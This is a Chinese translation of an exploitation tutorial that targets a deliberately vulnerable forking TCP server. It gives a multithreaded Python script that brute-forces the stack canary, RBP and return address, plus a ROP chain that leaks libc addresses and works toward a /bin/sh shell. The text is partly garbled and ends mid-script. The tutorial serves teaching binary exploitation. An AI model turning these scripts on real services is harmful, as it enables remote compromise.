一把梭哈常见保护机制PIE&&Canary

  • A+

译文声明
本文是翻译文章,文章原作者Shivam Shrirao ,文章来源:https://www.ret2rop.com
原文地址:https://www.ret2rop.com/2020/05/canary-pie-byte-bruteforce.html

案例分析

之前,我们已经实现在关闭canary和PIE保护的情况下,通过Got表泄露libc地址,进而获取libc版本。现在,我们要增大难度,在一个远程64位服务器上绕过所有保护(CANARY,PIE和DEP)。

测试源码如下:
```

include

include

include

include

include

include

include

include

void handle_request(int cfd){
char prompt[] = "Enter message: ";
char msg[200];
write(cfd, prompt, strlen(prompt));
read(cfd, msg, 1024);
// process the message.
}

int main(int argc, char const argv[])
{
int PORT=0;
if(argc > 1){
PORT = atoi(argv[1]); // get port to listen on from first argument.
}
if(!PORT){
PORT=8888;
}
int sfd,opt=1,cfd;
if((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ // initialize tcp server socket file descriptor.
printf("[!] socket failed.n");
exit(-1);
}
struct sockaddr_in s_addr; // struct to hold server socket configurations.
if(setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR | SO_REUSEPORT, &opt, sizeof(opt)) < 0){ // So that multiple clients can connect to server at same time.
printf("[!] setsockopt failed.n");
exit(-1);
}
s_addr.sin_family=AF_INET;
s_addr.sin_port=htons(PORT);
s_addr.sin_addr.s_addr=INADDR_ANY; // any available address (listens on all interfaces i.e. 0.0.0.0)
if(bind(sfd,(struct sockaddr
)&s_addr, sizeof(s_addr)) < 0){ // bind to the port
printf("[!] bind failed.n");
exit(-1);
}
if(listen(sfd,10) < 0){ // start listening for connections.
printf("[!] listen failed.n");
exit(-1);
}
char sip[INET_ADDRSTRLEN];
inet_ntop(AF_INET, &(s_addr.sin_addr), sip, INET_ADDRSTRLEN); // server ip address
printf("[i] Listening on %s:%d, sfd is %dn", sip, PORT, sfd);
struct sockaddr_in c_addr; // struct to hold client.
socklen_t addr_len = sizeof(c_addr);
while(1){
if((cfd = accept(sfd,(struct sockaddr)&c_addr,(socklen_t)&addr_len)) < 0){ // accept connection from client
printf("[!] accept failed.n");
}
else{
pid_t pid;
if((pid=fork()) == 0){ // fork, create new child process to handle the request.
close(sfd); // close server file descriptor in child.
char cip[INET_ADDRSTRLEN];
int cport = ntohs(c_addr.sin_port); // client port
inet_ntop(AF_INET, &(c_addr.sin_addr), cip, INET_ADDRSTRLEN); // client ip address
printf("[*] Accepted, cfd %d from %s:%d, pid: %dn", cfd, cip, cport, getpid());
handle_request(cfd);
char closing[] = "Request complete, Closing...n";
write(cfd, closing, strlen(closing)); // closing message.
close(cfd);
exit(0); // exit child after client is served.
}
else{
signal(SIGCHLD,SIG_IGN); // ignore exit status of child to kill zombie child.
close(cfd); // close connection in parent process.
}
}
}
close(sfd); // program won't actually reach this.
return 0;
}

```
完整的代码请点击msg_server.c

这是一个非常简单的tcp服务器示例,它从客户端读取信息并进行处理。还可以通过派生出的子进程为多个客户端提供服务(事实上通过fork()派生子进程的方式实现并行处理的效率并不高,现实中更多采用多处理和多线程的方式)。

使用gcc进行编译
gcc version 9.3.0
$ gcc msg_server.c -o msg_server

查看程序保护情况。
gdb-peda$ checksec
CANARY : ENABLED
FORTIFY : disabled
NX : ENABLED
PIE : ENABLED
RELRO : Partial

使用下面命令运行程序
$ ./msg_server 8888
[i] Listening on PORT 8888, sfd is 3

尝试用netcat进行连接。
$ nc 127.0.0.1 8888 -v
localhost [127.0.0.1] 8888 (ddi-tcp-1) open
Enter message: hello server
Request complete, Closing...

连接成功后,服务器端会有回显
$ ./msg_server 8888
[i] Listening on 0.0.0.0:8888, sfd is 3
[*] Accepted, cfd 4 from 127.0.0.1:51306, pid: 106227

您还可以尝试同时与多个客户端建立连接。

下图是IDA的反汇编窗口,您可以看到服务器响应连接后,会派生出一个子进程,该进程首先会打印客户端的一些信息。然后调用'handle_request'函数去处理来自客户端的请求。
::: hljs-center

1.png

:::

如果您对fork系统调用不熟悉,可以使用帮助手册(man 2 fork)或网络搜索的方式了解更多信息。fork()函数通过系统调用创建一个与原来进程几乎完全相同的进程,并且父子进程运行的内存是隔离的,相互独立。

在handle_request函数内,我们可以看到它会从客户端读取1024个字节,存储到只有400个字节大小的缓冲区内。这是一个经典的缓冲区溢出漏洞,但是由于程序开启了金丝雀保护,在进行缓冲区溢出攻击时,金丝雀的值也会被覆盖。由于函数在返回前会校验金丝雀的值,如果校验失败,程序将终止,并显示消息“ stack smashing detected”。

::: hljs-center

2.png

:::

如果我们不能泄露出canary的值,即便实现了缓冲区溢出,程序也会因为金丝雀校验失败而终止。

部分覆盖

我们知道金丝雀位于缓冲区之后,也就是说前200个字节是缓冲区空间,金丝雀是从第201个字节开始的。也就是说如果我们构造了201个字节的payload,将会覆盖金丝雀的一个字节,导致堆栈检查失败。

我们在gdb中加载二进制文件,并设置follow fork mode child,以便gdb可以自动附加到fork上的子进程。如果您想附加到父进程,可以把参数设置为parent。您还可以在gdb运行的时候附加到子进程,但是此时能可能需要更高的权限或者检查ptrace_scope的值(文件位于/etc/sysctl.d/目录下)。也可以直接使用attch或者at,后面跟上进程的pid的方式附加到子进程。

$ gdb msg_server -q
Reading symbols from msg_server...
(No debugging symbols found in msg_server)
gdb-peda$ set follow-fork-mode child
gdb-peda$ disas handle_request
Dump of assembler code for function handle_request:
0x0000000000001269 <+0>: push rbp
0x000000000000126a <+1>: mov rbp,rsp
0x000000000000126d <+4>: sub rsp,0xf0
0x0000000000001274 <+11>: mov DWORD PTR [rbp-0xe4],edi
0x000000000000127a <+17>: mov rax,QWORD PTR fs:0x28
0x0000000000001283 <+26>: mov QWORD PTR [rbp-0x8],rax
0x0000000000001287 <+30>: xor eax,eax
0x0000000000001289 <+32>: movabs rax,0x656d207265746e45
0x0000000000001293 <+42>: movabs rdx,0x203a6567617373
0x000000000000129d <+52>: mov QWORD PTR [rbp-0xe0],rax
0x00000000000012a4 <+59>: mov QWORD PTR [rbp-0xd8],rdx
0x00000000000012ab <+66>: lea rax,[rbp-0xe0]
0x00000000000012b2 <+73>: mov rdi,rax
0x00000000000012b5 <+76>: call 0x1080 <[email protected]>
0x00000000000012ba <+81>: mov rdx,rax
0x00000000000012bd <+84>: lea rcx,[rbp-0xe0]
0x00000000000012c4 <+91>: mov eax,DWORD PTR [rbp-0xe4]
0x00000000000012ca <+97>: mov rsi,rcx
0x00000000000012cd <+100>: mov edi,eax
0x00000000000012cf <+102>: call 0x1060 <[email protected]>
0x00000000000012d4 <+107>: lea rcx,[rbp-0xd0]
0x00000000000012db <+114>: mov eax,DWORD PTR [rbp-0xe4]
0x00000000000012e1 <+120>: mov edx,0x400
0x00000000000012e6 <+125>: mov rsi,rcx
0x00000000000012e9 <+128>: mov edi,eax
0x00000000000012eb <+130>: call 0x10d0 <[email protected]>
0x00000000000012f0 <+135>: nop
0x00000000000012f1 <+136>: mov rax,QWORD PTR [rbp-0x8]
0x00000000000012f5 <+140>: xor rax,QWORD PTR fs:0x28 ; canary is checked here
0x00000000000012fe <+149>: je 0x1305 <handle_request+156>
0x0000000000001300 <+151>: call 0x1090 <[email protected]>
0x0000000000001305 <+156>: leave
0x0000000000001306 <+157>: ret
End of assembler dump.
gdb-peda$ b *handle_request+140 # set breakpoint at check
Breakpoint 1 at 0x12f5
gdb-peda$ r
Starting program: /home/archer/compiler_tests/msg_server
[i] Listening on 0.0.0.0:8888, sfd is 3

下面我们进行测试。我们先发送201个字节(200个字节的“A”,并用“B”覆盖一个字节(0x42))payload进行测试。
::: hljs-center

3.jpg

:::

```

!/usr/bin/env python3

import socket

TRGT = ('192.168.0.6', 8888) # ip and port

buf = b'A'*200
buf+= b'B' # overwrite canary's first byte with B

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) # create TCP socket
s.connect(TRGT) # connect to target
s.recv(1024) # receive initial prompt
s.send(buf) # send payload
ret = s.recv(1024) # receive response
print(ret)
查看完整代码请点击[partial_test.py](https://gist.github.com/ShivamShrirao/86398099214d7e8717ee91cad0af3445#file-partial_test-py)
在运行python脚本之后,我们可以看到如下内容。canary位于rax寄存器中,它的第一个字节已经被覆盖为‘B’,如果您继续运行,程序就会终止并显示"stack smashing detected"。

[Attaching after process 566648 fork to child process 566654]
[New inferior 2 (process 566654)]
[Detaching after fork from parent process 566648]
[Inferior 1 (process 566648) detached]
[*] Accepted, cfd 4 from 192.168.0.6:46268, pid: 566654
[Switching to process 566654]
[----------------------------------registers-----------------------------------]
RAX: 0x8564c5f6ec932442 <== stack canary overwritten by 42(B)
RBX: 0x0
RCX: 0x7ffff7eadab2 (: cmp rax,0xfffffffffffff000)
RDX: 0x400
RSI: 0x7fffffffdb10 ('A' ...)
RDI: 0x4
RBP: 0x7fffffffdbe0 --> 0x7fffffffdc90 --> 0x5555555555e0 (<__libc_csu_init>: endbr64)
RSP: 0x7fffffffdaf0 --> 0x0
RIP: 0x5555555552f5 (: xor rax,QWORD PTR fs:0x28)
R8 : 0x0
R9 : 0x38 ('8')
R10: 0x555555554602 --> 0x7465730064616572 ('read')
R11: 0x246
R12: 0x555555555170 (<_start>: endbr64)
R13: 0x0
R14: 0x0
R15: 0x0
EFLAGS: 0x207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x5555555552eb : call 0x5555555550d0 read@plt
0x5555555552f0 : nop
0x5555555552f1 : mov rax,QWORD PTR [rbp-0x8]
=> 0x5555555552f5 : xor rax,QWORD PTR fs:0x28
0x5555555552fe : je 0x555555555305
0x555555555300 : call 0x555555555090 __stack_chk_fail@plt
0x555555555305 : leave

0x555555555306 : ret
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdaf0 --> 0x0
0008| 0x7fffffffdaf8 --> 0x400000000
0016| 0x7fffffffdb00 ("Enter message: ")
0024| 0x7fffffffdb08 --> 0x203a6567617373 ('ssage: ')
0032| 0x7fffffffdb10 ('A' ...)
0040| 0x7fffffffdb18 ('A' , "B$223354366305d205"...)
0048| 0x7fffffffdb20 ('A' , "B$223354366305d205220334377377377177")
0056| 0x7fffffffdb28 ('A' , "B$223354366305d205220334377377377177")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 2.1 "msg_server" hit Breakpoint 1, 0x00005555555552f5 in handle_request ()
gdb-peda$ c
Continuing.
stack smashing detected : terminated

Thread 2.1 "msg_server" received signal SIGABRT, Aborted.
```
为了完成溢出攻击,我们需要猜解出canary的值。一个字节的取值范围是0x00到0xff,一共有256种可能。这意味着我最多进行256次尝试就可以爆破出一个字节。

但是还存在另外一个棘手的问题。每当堆栈检查失败时,程序就会调用__stack_chk_fail函数,终止进程。而当程序再次运行时,将会出现一个新的金丝雀的值,之前的值就会失效。

暴力破解字节

如前所述,服务器监听父进程,然后派生出一个子进程来处理客户端请求。由于缓冲区溢出发生在用于处理请求的子进程,因此子进程会因为破坏canary值而终止。但是父进程会继续监听新的连接,并派生新的子进程。更重要的是由于子进程相当于父进程的复制品,它们的canary值是相同的。

我们可以通过不断爆破子进程的canary值,间接的获得父进程的canary值。如果我们命中了正常的canary值,则程序正常回显,响应消息并正常关闭连接。如果回显正常,我们可以对之后的字节做同样的操作,直到成功爆破出8个字节的canary值。在最坏的情况下,我们将进行256*8次尝试,事实上,我们并不需要尝试这么多次,请往下看。

优化Canary的暴力破解

通过多次运行程序,在堆栈中设置断点查看金丝雀的值,我们发现爆破canary的方法可以进一步优化。下面是一些示例:
0xc5e1de93dc0f3c00
0xa276c81bfbeefe00
0x09368174f1139400
0x8564c5f6ec932400
0x6b420d65bbf27d00
0x847149724750a000

您可能会注意到canary总是以00结尾,这么做为了防止canary的值泄漏。比如在canary上面是一个字符串,正常来说字符串后面有00截断,如果我们恶意写满字符串空间,而程序后面又把字符串打印出来了,那个由于没有00截断canary的值也被顺带打印出来了。在我们的实例中是使用read进行数据读取,不会出现上述问题。

现在我们已经有了初步方案去泄露canary,但这是远远不够的。我们还需要通过rop gadgets来泄露libc地址。但是由于程序开启了PIE保护,也就意味着aslr也是默认开启的(只有开启aslr之后,PIE才生效)。

在canary之后,我们可以看到8字节的RBP,这个一个堆栈地址。在RBP之后,是程序的返回地址。虽然程序每次运行的基址会变,但程序中的各段的相对偏移是不会变的,只要泄露出来一个地址,比如函数栈帧中的返回地址。进而通过计算得到基地址,就可以达到绕过PIE的目的。我们仍然采用暴力破解的方式,逐字节进行爆破。

脚本优化

为了寻找规律,我们可以在gdb中键入以下命令:
gdb-peda$ aslr on

运行几次后,您会注意到一个有趣的现象:

1.RBP地址的前三个字节” 00 00 7f”是固定不变了,而第四个字节的变化范围也是有规律可寻的,它总在“ fc”到“ ff”之间变化。这样可以大大降低暴力破解的工作量,最多运行4+256*4=1028即可得到结果。

2.返回地址的前两个字节”00 00”始终是保持不变了,而且第三个字节也总是在’55’与’56’之间变化。这又缩小了我们的搜索范围。PIE技术还有一个缺陷,我们知道,内存是以页载入机制,如果开启PIE保护的话,只能影响到单个内存页,一个内存页大小为0x1000,那么就意味着不管地址怎么变,某一条指令的后三位十六进制数的地址是始终不变的。现在我们最多尝试2 + 256*3 + 16 = 786次即可爆破出返回地址。

我们可以静态反汇编main函数,寻找handle_request函数返回后的地址:
gdb-peda$ disas main
Dump of assembler code for function main:
.
.
0x000000000000154d <+582>: call 0x1269 <handle_request>
0x0000000000001552 <+587>: movabs rax,0x2074736575716572
^^^== return address

由于PIE的缺陷,返回地址中最后三个字节’552’是始终不会改变的。

编写Bruteforce脚本

以下是我们编写脚本的思路:
1.溢出缓冲区。
2. 对Canary、RBP和返回地址,进行逐字节执爆破
3.根据回显判断判断爆破是否成功,若成功,继续进行下一字节的爆破
4.通过静态反汇编寻找偏移值
5.爆破出canary/返回地址
6.返回地址减去固定的偏移量即可得到基地址

为了加快效率,我仍然采用多线程的方式运行payload。具体的线程数取决于计算机本身的性能。如果在VM中运行脚本,请减少线程数。
```

!/usr/bin/env python3

from struct import pack,unpack
from threading import Thread
from telnetlib import Telnet
from time import sleep
import socket
import sys

p64 = lambda x: pack("Q",x) # convert to little endian
u64 = lambda x: unpack("Q",x)[0] # revert back from little endian

TRGT = (sys.argv[1], int(sys.argv[2])) # ip and port as arguments
N_THREADS = 256 # number of maximum threads, reduce according to your machine

def Threaded(fn): # annotation wrapper to launch a function as a thread
def wrapper(args, *kwargs):
t = Thread(target=fn, args=args, kwargs=kwargs)
t.setDaemon(True)
t.start()
return t
return wrapper

def default_range(leak): # default range of values
return range(0x100) # '0x00' to '0xff'

class FoundInstance: # class to store flag for finding a particular byte
def init(self):
self.FOUND_IT=False

class Bruter: # class to bruteforce addresses
def init(self):
self.start = b'' # start bytes of address
self.end = b'' # end bytes of address
self.buf = b'A'*200 # length of buffer
self.msg = "Leaking : t" # message to print
self.thrds = [] # store the threads

@Threaded                                       # will make it launch as a thread
def find_at(self, val, inst, ln_st):
    if not inst.FOUND_IT:                       # check flag if particular byte was found
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(TRGT)                         # connect to target
        s.recv(1024)                            # receive input prompt
        s.send(self.buf + self.start+bytes([val]))  # send payload with next attempted byte val
        ret=s.recv(1024)                        # receive response
        s.close()                               # close socket
        if b'Request complete, Closing' in ret: # check if server sent correct response
            if not inst.FOUND_IT:               # if values isn't found yet, done to check for some race conditions
                if len(self.start) == ln_st:    # check if it's not changed.
                    self.start+=bytes([val])    # add the correct byte
                    inst.FOUND_IT=True          # set flag

def iterate_range(self,get_range):
    inst=FoundInstance()
    for val in get_range(self.start):
        self.thrds.append(self.find_at(val, inst, len(self.start)))
        print('r' + self.msg + '0x' + self.end.hex() + (hex(val)[2:]+self.start[::-1].hex()).rjust(16-2*len(self.end), '0'), end=' ')
        while len(self.thrds)>=N_THREADS:       # to wait if max threads are reached
            sleep(0.2)                          # wait a bit
            for ix,t in enumerate(self.thrds):  # enumerate through threads
                if not t.is_alive():            # check if thread has finished executing
                    self.thrds.pop(ix)          # remove thread if executed
            if inst.FOUND_IT:
                return                          # return from function if found during while loop
        if inst.FOUND_IT:
            return                              # return from function if found during for loop

def call(self, get_range=default_range):
    len_rem = 8-len(self.end)                   # calculate no of bytes remaining
    while len(self.start)<len_rem:              # until all bytes are found
        self.iterate_range(get_range)           # call function to check all values for particular byte in range
        print('r' + self.msg + '0x' + self.end.hex() + self.start[len_rem::-1].hex().rjust(16-2*len(self.end), '0'), end='  ')
    print()
    return self.start[:len_rem] + self.end[::-1]# return complete address

brt = Bruter() # initialize bruter
brt.start = b'x00' # stack canary always has 0x00 a null byte
brt.end = b'' # no pattern for this
brt.buf = b'A'*200 # buffer length, offset to canary
brt.msg = "Leaking CANARY:t"

CANARY = u64(brt.call()) # call and start bruteforce, save canary to variable

brt = Bruter()
brt.start = b''
brt.end = b'x00x00x7f' # RBP has this constant
brt.buf = b'A'*200
brt.buf += p64(CANARY) # add leaked canary to payload
brt.msg = "Leaking RBP:t"
def rbp_range(leak):
if len(leak)==4: # 5th byte of RBP changes from 0xfc to 0xff
return range(0xfc,0x100)
else:
return range(0x100)

RBP = u64(brt.call(rbp_range))

Offset to return address is 0x1552

brt = Bruter()
brt.start = b'x52' # return address constant byte at start
brt.end = b'x00x00' # constant bytes at end
brt.buf = b'A'*200
brt.buf += p64(CANARY) # add leaked canary
brt.buf += p64(RBP) # add leaked RBP
brt.msg = "Leaking RET:t"
def ret_range(leak):
if len(leak)==1: # '5 52' is constant. '0x52' is already in start variable
return range(0x5,0x100,0x10) # generates values ending with '5'
if len(leak) == 5:
return range(0x55,0x57) # 6th byte changes from '0x55' to '0x56'
else:
return range(0x100)

RET = u64(brt.call(ret_range))

BIN_BASE = RET - 0x1552 # Subtract offset to return address to get base address of bianry
print("[*] Binary base calculated:t",hex(BIN_BASE))
```

在我的机器上,整个过程大概花费了5-10秒。
::: hljs-center

4.jpg

:::

泄漏Libc地址并识别libc版本

现在我们已经有了基地址,而且已经成功绕过来PIE。我们接下来要做的就是泄露libc的地址,然后利用偏移构造ROP。我们上一篇文章是将构造好的参数传入printf函数,在GOT表中泄露了libc地址。这是,我们可以如法炮制,使用
write函数进行泄露。Write函数接收3个参数:
1.文件描述符
2.指定的缓冲区
3.要写入文件的字节数

Linux内核将一切视为文件,所有对设备和文件的操作都使用文件描述符来进行的。客户端与服务器使用套接字进行通信,并且可以通过文件描述符来访问sockets。所以为了调用write函数,我们需要找到对于套接字的文件描述符。父进程在调用fork的时候,子进程会继承父进程的accept函数返回的cfd文件描述符。在我们的示例中,在服务器显示’cfd 4’。你会发现所有的客户端的cfd号始终为’4’。这是因为服务器为每个客户端派生了一个重复的子进程, 既然新的客户由子进程提供服务,父进程就关闭已连接套接字。由于每个子进程都是父进程的复制品,所有每个子进程的cfd均为4。

我们还可以通过在程序调用write向child发送响应时设置断点,并读取rdi寄存器中的第一个参数时,读取文件描述符。

构造ROP链

如之前所述,write需要3个参数,又因为这是64位的程序,我们需要将这三个参数分别传入rdi,rsi,rdx寄存器。我们使用ROPgadget工具寻找可利用的代码段。
$ ROPgadget --binary msg_server | grep "pop rdi"
0x0000000000001643 : pop rdi ; ret
$ ROPgadget --binary msg_server | grep "pop rsi"
0x0000000000001641 : pop rsi ; pop r15 ; ret
$ ROPgadget --binary msg_server | grep "rdx"
0x0000000000001011 : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret

我们只找到了pop rdi和pop rsi两个可利用的代码段,但是没有找到pop rdx。但是,我们可以换一种思路,rdx寄存器是用于指定从缓冲区读取的字节数,我们只需要在执行ROP链之前,向rdx中塞入合适的值,也能达到相同的目的。我们需要先检查一下在handle_request()返回之前寄存器的值。
```
0x0000000000001305 <+156>: leave

0x0000000000001306 <+157>: ret

End of assembler dump.
gdb-peda$ b handle_request +157
Breakpoint 1 at 0x1306
gdb-peda$ r
Starting program: /home/archer/compiler_tests/msg_server
[i] Listening on 0.0.0.0:8888, sfd is 3
[Attaching after process 394793 fork to child process 394798]
[New inferior 2 (process 394798)]
[Detaching after fork from parent process 394793]
[Inferior 1 (process 394793) detached]
[
] Accepted, cfd 4 from 192.168.0.6:54926, pid: 394798
[Switching to process 394798]
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7f62eb5a8ab2 (: cmp rax,0xfffffffffffff000)
RDX: 0x400 <== 1024 bytes will work
RSI: 0x7fff132fa4c0 ('A' )
RDI: 0x4 <== already has client socket file desciptor
RBP: 0x7fff132fa640 --> 0x556ea1f015e0 (<__libc_csu_init>: endbr64)
RSP: 0x7fff132fa598 --> 0x556ea1f01552 (: movabs rax,0x2074736575716552)
RIP: 0x556ea1f01306 (: ret)
R8 : 0x0
R9 : 0x38 ('8')
R10: 0x556ea1f00602 --> 0x7465730064616572 ('read')
R11: 0x246
R12: 0x556ea1f01170 (<_start>: endbr64)
R13: 0x0
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x556ea1f012fe : je 0x556ea1f01305
0x556ea1f01300 : call 0x556ea1f01090 __stack_chk_fail@plt
0x556ea1f01305 : leave

=> 0x556ea1f01306 : ret

0x556ea1f01307 : push rbp
0x556ea1f01308 : mov rbp,rsp
0x556ea1f0130b : sub rsp,0xa0
0x556ea1f01312 : mov DWORD PTR [rbp-0x94],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fff132fa598 --> 0x556ea1f01552 (: movabs rax,0x2074736575716552)
0008| 0x7fff132fa5a0 --> 0x7fff132fa738 --> 0x7fff132fc1bb ("/home/archer/compiler_tests/msg_server")
0016| 0x7fff132fa5a8 --> 0x100000000
0024| 0x7fff132fa5b0 --> 0x100000000
0032| 0x7fff132fa5b8 --> 0x22b800000010
0040| 0x7fff132fa5c0 --> 0x400000003
0048| 0x7fff132fa5c8 --> 0xd68e00000000
0056| 0x7fff132fa5d0 --> 0xb8220002
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 2.1 "msg_server" hit Breakpoint 1, 0x0000556ea1f01306 in handle_request ()
gdb-peda$
此时,我们可以看到rdx的值为0x400,这就意味着我们可以从GOT表读取1024个字节。好极了!我们可以通过这种方式,泄露GOT表中多个libc地址。而且在执行rop链之前,rdi中存储的值正是write的文件描述符’4’。我们也不用再通过pop的方式向rdi中进行传值了。最后我们通过info functions命令查看GOT表中函数次序。例如我们泄露了1024个字节,如果前8个字节是write函数,那么接下来的8个字节是getpid函数的地址,以此类推。
$ gdb msg_server -q
Reading symbols from msg_server...
(No debugging symbols found in msg_server)
gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x0000000000001000 _init
0x0000000000001030 [email protected]
0x0000000000001040 [email protected]
0x0000000000001050 [email protected]
0x0000000000001060 [email protected]
0x0000000000001070 [email protected]
0x0000000000001080 [email protected]
0x0000000000001090 [email protected]
0x00000000000010a0 [email protected]
0x00000000000010b0 [email protected]
0x00000000000010c0 [email protected]
0x00000000000010d0 [email protected]
0x00000000000010e0 [email protected]
0x00000000000010f0 [email protected]
0x0000000000001100 [email protected]
0x0000000000001110 [email protected]
0x0000000000001120 [email protected]
0x0000000000001130 [email protected]
0x0000000000001140 [email protected]
0x0000000000001150 [email protected]
0x0000000000001160 [email protected]
0x0000000000001170 _start
0x00000000000011a0 deregister_tm_clones
0x00000000000011d0 register_tm_clones
0x0000000000001210 __do_global_dtors_aux
0x0000000000001260 frame_dummy
0x0000000000001269 handle_request
0x0000000000001307 main
0x00000000000015e0 __libc_csu_init
0x0000000000001650 __libc_csu_fini
0x0000000000001658 _fini
gdb-peda$ disas 0x0000000000001060
Dump of assembler code for function [email protected]:
0x0000000000001060 <+0>: jmp QWORD PTR [rip+0x2fca] # 0x4030 write@got.plt
0x0000000000001066 <+6>: push 0x3
0x000000000000106b <+11>: jmp 0x1020
End of assembler dump.
gdb-peda$ x/gx 0x4030
0x4030 write@got.plt: 0x0000000000001066
gdb-peda$
0x4038 getpid@got.plt: 0x0000000000001076
gdb-peda$
0x4040 strlen@got.plt: 0x0000000000001086
gdb-peda$
0x4048 __stack_chk_fail@got.plt: 0x0000000000001096
gdb-peda$
```

将以下脚本添加到先前的暴力破解脚本中。
```
pop_rdi = BIN_BASE + 0x001643
pop_rsi_r15 = BIN_BASE + 0x001641
ret_gad = BIN_BASE + 0x1306

write_plt = BIN_BASE + 0x1060
write_got = BIN_BASE + 0x4030

buf = b'A'200
buf+= p64(CANARY)
buf+= p64(RBP)
buf+= p64(pop_rsi_r15) # just load address of write_got into rsi, rdi and rdx are already filled
buf+= p64(write_got)
2 # 2 times for r15
buf+= p64(write_plt) # call write
buf+= p64(RET) # continue execution normally

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(TRGT)
s.recv(1024)
s.send(buf)
ret = s.recv(1024)
print(ret[:128])

libc_write = u64(ret[:8]) # first 8 bytes will be liibc address of write
libc_getpid = u64(ret[8:16])
print("[] Leaked libc write:t",hex(libc_write))
print("[
] Leaked libc getpid:t",hex(libc_getpid))
```

这里查看完整的brute_address_part2.py代码

将两部分的代码合并在一起,运行结果如下:
$ python brute_address.py 192.168.0.8 8888
Leaking CANARY: 0x40d4c335a6559000
Leaking RBP: 0x00007ffec5e51c90
Leaking RET: 0x000055ae37ba9552
[*] Binary base calculated: 0x55ae37ba8000
b'@x80J|~x7fx00x00xb0xe0G|~x7fx00x00xd0$R|~x7fx00x00px99L|~x7fx00x00xd0x99L|~x7fx00x00x10xbe?|~x7fx00x00xe0x87J|~x7fx00x00xa0x7fJ|~x7fx00x00x80xd0=|~x7fx00x00x90xa2K|~x7fx00x00xd0x99L|~x7fx00x000xa1K|~x7fx00x00x90xa0K|~x7fx00x000xe7=|~x7fx00x00xc0x0b>|~x7fx00x00xe0xceG|~x7fx00x00'
[*] Leaked libc write: 0x7f7e7c4a8040
[*] Leaked libc getpid: 0x7f7e7c47e0b0
Request complete, Closing...
*** Connection closed by remote host ***

现在我们已经得到了write和getpid函数的地址,我们只需要后三位即可。通过libc.nullbyte.cat,从libc数据库的识别远程计算机libc版本。
::: hljs-center

5.png

:::

至此我们已经成功泄露出libc基址。

获取交互shell

由于我们已经知道了libc版本,我们只需找到str_bin_sh和system函数的相对偏移,通过执行system('/bin/sh')获取shell。但是此时我们获取的并不是一个交互性shell。因为shell的工作方式是从标准输入stdin中读取数据,并输出到stdout。所以我们需要使用dup2来复制一个文件的描述符,重定向进程的stdin、stdout和stderr。我们之前提到过在linux下一切皆文件。stdin、stdout和stderr默认的文件描述符分别是0、1和2。

下面是dup2的说明文档:
```
$ man 2 dup2
NAME
dup, dup2, dup3 - duplicate a file descriptor
SYNOPSIS
#include
int dup(int oldfd);
int dup2(int oldfd, int newfd);
DESCRIPTION
The dup() system call creates a copy of the file descriptor oldfd,
using the lowest-numbered unused file descriptor for the new descriptor.

   After a successful return, the old and new file descriptors may be
   used  interchangeably.  They refer to the same open file description
   (see open(2)) and thus share file offset and file status flags...

我们可以使用cfd作为stdin, stdout和stderr。调用方式如下:
dup2(4, 0);
dup2(4, 1);
dup2(4, 2);
system("/bin/sh");
下面是代码的完整运行示例:

!/usr/bin/env python3

from struct import pack,unpack
from threading import Thread
from telnetlib import Telnet
from time import sleep
import socket
import sys

p64 = lambda x: pack("Q",x) # convert to little endian
u64 = lambda x: unpack("Q",x)[0] # revert back from little endian

TRGT = (sys.argv[1], int(sys.argv[2])) # ip and port as arguments
N_THREADS = 256 # number of maximum threads, reduce according to your machine

def Threaded(fn): # annotation wrapper to launch a function as a thread
def wrapper(args, *kwargs):
t = Thread(target=fn, args=args, kwargs=kwargs)
t.setDaemon(True)
t.start()
return t
return wrapper

def default_range(leak): # default range of values
return range(0x100) # '0x00' to '0xff'

class FoundInstance: # class to store flag for finding a particular byte
def init(self):
self.FOUND_IT=False

class Bruter: # class to bruteforce addresses
def init(self):
self.start = b'' # start bytes of address
self.end = b'' # end bytes of address
self.buf = b'A'*200 # length of buffer
self.msg = "Leaking : t" # message to print
self.thrds = [] # store the threads

@Threaded                                       # will make it launch as a thread
def find_at(self, val, inst, ln_st):
    if not inst.FOUND_IT:                       # check flag if particular byte was found
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(TRGT)                         # connect to target
        s.recv(1024)                            # receive input prompt
        s.send(self.buf + self.start+bytes([val]))  # send payload with next attempted byte val
        ret=s.recv(1024)                        # receive response
        s.close()                               # close socket
        if b'Request complete, Closing' in ret: # check if server sent correct response
            if not inst.FOUND_IT:               # if values isn't found yet, done to check for some race conditions
                if len(self.start) == ln_st:    # check if it's not changed.
                    self.start+=bytes([val])    # add the correct byte
                    inst.FOUND_IT=True          # set flag

def iterate_range(self,get_range):
    inst=FoundInstance()
    for val in get_range(self.start):
        self.thrds.append(self.find_at(val, inst, len(self.start)))
        print('r' + self.msg + '0x' + self.end.hex() + (hex(val)[2:]+self.start[::-1].hex()).rjust(16-2*len(self.end), '0'), end=' ')
        while len(self.thrds)>=N_THREADS:       # to wait if max threads are reached
            sleep(0.2)                          # wait a bit
            for ix,t in enumerate(self.thrds):  # enumerate through threads
                if not t.is_alive():            # check if thread has finished executing
                    self.thrds.pop(ix)          # remove thread if executed
            if inst.FOUND_IT:
                return                          # return from function if found during while loop
        if inst.FOUND_IT:
            return                              # return from function if found during for loop

def call(self, get_range=default_range):
    len_rem = 8-len(self.end)                   # calculate no of bytes remaining
    while len(self.start)<len_rem:              # until all bytes are found
        self.iterate_range(get_range)           # call function to check all values for particular byte in range
        print('r' + self.msg + '0x' + self.end.hex() + self.start[len_rem::-1].hex().rjust(16-2*len(self.end), '0'), end='  ')
    print()
    return self.start[:len_rem] + self.end[::-1]# return complete address

brt = Bruter() # initialize bruter
brt.start = b'x00' # stack canary always has 0x00 a null byte
